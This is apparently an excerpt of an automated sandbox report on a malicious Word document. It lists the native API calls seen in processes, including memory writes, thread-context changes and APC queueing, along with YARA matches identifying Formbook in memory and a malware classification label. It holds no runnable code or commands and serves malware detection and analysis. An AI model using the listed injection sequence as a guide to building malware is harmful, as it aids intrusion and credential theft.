Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FFB4 NtCreateSection,LdrInitializeThunk,	5_2_0083FFB4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008410D0 NtOpenProcessToken,	5_2_008410D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840060 NtQuerySection,	5_2_00840060
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008401D4 NtSetValueKey,	5_2_008401D4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084010C NtOpenDirectoryObject,	5_2_0084010C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00841148 NtOpenThread,	5_2_00841148
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008407AC NtCreateMutant,	5_2_008407AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F8CC NtWaitForSingleObject,	5_2_0083F8CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00841930 NtSetContextThread,	5_2_00841930
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F938 NtWriteFile,	5_2_0083F938
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FAB8 NtQueryValueKey,	5_2_0083FAB8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FA20 NtQueryInformationFile,	5_2_0083FA20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FA50 NtEnumerateValueKey,	5_2_0083FA50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FBE8 NtQueryVirtualMemory,	5_2_0083FBE8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FB50 NtCreateKey,	5_2_0083FB50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC30 NtOpenProcess,	5_2_0083FC30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840C40 NtGetContextThread,	5_2_00840C40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC48 NtSetInformationFile,	5_2_0083FC48
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00841D80 NtSuspendThread,	5_2_00841D80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FD5C NtEnumerateKey,	5_2_0083FD5C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FE24 NtWriteVirtualMemory,	5_2_0083FE24
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FFFC NtCreateProcessEx,	5_2_0083FFFC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FF34 NtQueueApcThread,	5_2_0083FF34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E100C4 NtCreateFile,LdrInitializeThunk,	7_2_01E100C4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E107AC NtCreateMutant,LdrInitializeThunk,	7_2_01E107AC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F9F0 NtClose,LdrInitializeThunk,	7_2_01E0F9F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F900 NtReadFile,LdrInitializeThunk,	7_2_01E0F900
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_01E0FBB8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_01E0FB68
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FB50 NtCreateKey,LdrInitializeThunk,	7_2_01E0FB50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_01E0FAE8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_01E0FAD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FAB8 NtQueryValueKey,LdrInitializeThunk,	7_2_01E0FAB8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_01E0FDC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FD8C NtDelayExecution,LdrInitializeThunk,	7_2_01E0FD8C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_01E0FC60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FFB4 NtCreateSection,LdrInitializeThunk,	7_2_01E0FFB4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_01E0FED0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E101D4 NtSetValueKey,	7_2_01E101D4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E11148 NtOpenThread,	7_2_01E11148
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1010C NtOpenDirectoryObject,	7_2_01E1010C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E110D0 NtOpenProcessToken,	7_2_01E110D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10060 NtQuerySection,	7_2_01E10060
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10078 NtResumeThread,	7_2_01E10078
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10048 NtProtectVirtualMemory,	7_2_01E10048
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E11930 NtSetContextThread,	7_2_01E11930
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F938 NtWriteFile,	7_2_01E0F938
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F8CC NtWaitForSingleObject,	7_2_01E0F8CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FBE8 NtQueryVirtualMemory,	7_2_01E0FBE8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FA50 NtEnumerateValueKey,	7_2_01E0FA50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FA20 NtQueryInformationFile,	7_2_01E0FA20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E11D80 NtSuspendThread,	7_2_01E11D80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FD5C NtEnumerateKey,	7_2_01E0FD5C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC90 NtUnmapViewOfSection,	7_2_01E0FC90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10C40 NtGetContextThread,	7_2_01E10C40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC48 NtSetInformationFile,	7_2_01E0FC48
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC30 NtOpenProcess,	7_2_01E0FC30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FFFC NtCreateProcessEx,	7_2_01E0FFFC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FF34 NtQueueApcThread,	7_2_01E0FF34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FEA0 NtReadVirtualMemory,	7_2_01E0FEA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FE24 NtWriteVirtualMemory,	7_2_01E0FE24
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099D60 NtCreateFile,	7_2_00099D60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099E10 NtReadFile,	7_2_00099E10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099E90 NtClose,	7_2_00099E90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099F40 NtAllocateVirtualMemory,	7_2_00099F40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099DB3 NtCreateFile,	7_2_00099DB3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099E8A NtClose,	7_2_00099E8A

Source: C:\Users\Public\69577.exe

Code function: 4_2_006B11E0 CreateProcessAsUserW,

4_2_006B11E0

Source: C:\Users\Public\69577.exe	Code function: 4_2_00255C5A	4_2_00255C5A
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025B919	4_2_0025B919
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025AE68	4_2_0025AE68
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025A66A	4_2_0025A66A
Source: C:\Users\Public\69577.exe	Code function: 4_2_00258E49	4_2_00258E49
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025E748	4_2_0025E748
Source: C:\Users\Public\69577.exe	Code function: 4_2_00257388	4_2_00257388
Source: C:\Users\Public\69577.exe	Code function: 4_2_00254FD0	4_2_00254FD0
Source: C:\Users\Public\69577.exe	Code function: 4_2_00254D60	4_2_00254D60
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025AE66	4_2_0025AE66
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025F258	4_2_0025F258
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025E738	4_2_0025E738
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B6448	4_2_006B6448
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B30E1	4_2_006B30E1
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B7138	4_2_006B7138
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B99D9	4_2_006B99D9
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B1DB9	4_2_006B1DB9
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B52D0	4_2_006B52D0
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B13D1	4_2_006B13D1
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B4BA0	4_2_006B4BA0
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B6439	4_2_006B6439
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B7C10	4_2_006B7C10
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B68C0	4_2_006B68C0
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B68B1	4_2_006B68B1
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B8890	4_2_006B8890
Source: C:\Users\Public\69577.exe	Code function: 4_2_006BA608	4_2_006BA608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401026	5_2_00401026
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401174	5_2_00401174
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401208	5_2_00401208
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041E2AF	5_2_0041E2AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402D87	5_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00409E40	5_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041E772	5_2_0041E772
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00E02050	5_2_00E02050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084E0C6	5_2_0084E0C6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0087D005	5_2_0087D005
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00853040	5_2_00853040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0086905A	5_2_0086905A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084E2E9	5_2_0084E2E9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008F1238	5_2_008F1238
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084F3CF	5_2_0084F3CF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008763DB	5_2_008763DB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00852305	5_2_00852305
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00857353	5_2_00857353
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0089A37B	5_2_0089A37B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00885485	5_2_00885485
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00861489	5_2_00861489
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0088D47D	5_2_0088D47D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0086C5F0	5_2_0086C5F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085351F	5_2_0085351F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00896540	5_2_00896540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00854680	5_2_00854680
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085E6C1	5_2_0085E6C1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008F2622	5_2_008F2622
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008D579A	5_2_008D579A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085C7BC	5_2_0085C7BC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008857C3	5_2_008857C3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008EF8EE	5_2_008EF8EE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085C85C	5_2_0085C85C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0087286D	5_2_0087286D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008F098E	5_2_008F098E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008529B2	5_2_008529B2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008669FE	5_2_008669FE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008D5955	5_2_008D5955
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00903A83	5_2_00903A83
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008FCBA4	5_2_008FCBA4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084FBD7	5_2_0084FBD7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008DDBDA	5_2_008DDBDA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00877B00	5_2_00877B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008EFDDD	5_2_008EFDDD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00880D3B	5_2_00880D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085CD5B	5_2_0085CD5B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00882E2F	5_2_00882E2F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0086EE4C	5_2_0086EE4C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00860F3F	5_2_00860F3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0087DF7C	5_2_0087DF7C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1E0C6	7_2_01E1E0C6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E23040	7_2_01E23040
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E3905A	7_2_01E3905A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E4D005	7_2_01E4D005
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1F3CF	7_2_01E1F3CF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E463DB	7_2_01E463DB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E6A37B	7_2_01E6A37B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E27353	7_2_01E27353
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E22305	7_2_01E22305
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1E2E9	7_2_01E1E2E9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EC1238	7_2_01EC1238
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E3C5F0	7_2_01E3C5F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2351F	7_2_01E2351F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E55485	7_2_01E55485
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E31489	7_2_01E31489
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E5D47D	7_2_01E5D47D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E557C3	7_2_01E557C3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2C7BC	7_2_01E2C7BC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EA579A	7_2_01EA579A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2E6C1	7_2_01E2E6C1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E24680	7_2_01E24680
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EC2622	7_2_01EC2622
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E369FE	7_2_01E369FE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E229B2	7_2_01E229B2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EC098E	7_2_01EC098E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EA5955	7_2_01EA5955
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EBF8EE	7_2_01EBF8EE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E4286D	7_2_01E4286D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2C85C	7_2_01E2C85C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EADBDA	7_2_01EADBDA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1FBD7	7_2_01E1FBD7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01ECCBA4	7_2_01ECCBA4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E47B00	7_2_01E47B00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01ED3A83	7_2_01ED3A83
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EBFDDD	7_2_01EBFDDD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2CD5B	7_2_01E2CD5B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E50D3B	7_2_01E50D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E4DF7C	7_2_01E4DF7C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E30F3F	7_2_01E30F3F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E3EE4C	7_2_01E3EE4C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E52E2F	7_2_01E52E2F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009E2AF	7_2_0009E2AF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009E772	7_2_0009E772
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00082D87	7_2_00082D87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00089E40	7_2_00089E40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00082FB0	7_2_00082FB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54

Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E63F92 appears 108 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E8F970 appears 81 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E6373B appears 238 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E1DF5C appears 112 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E1E2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0084DF5C appears 118 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 00893F92 appears 108 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 008BF970 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0089373B appears 238 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0084E2A8 appears 38 times

Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@9/13@4/4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

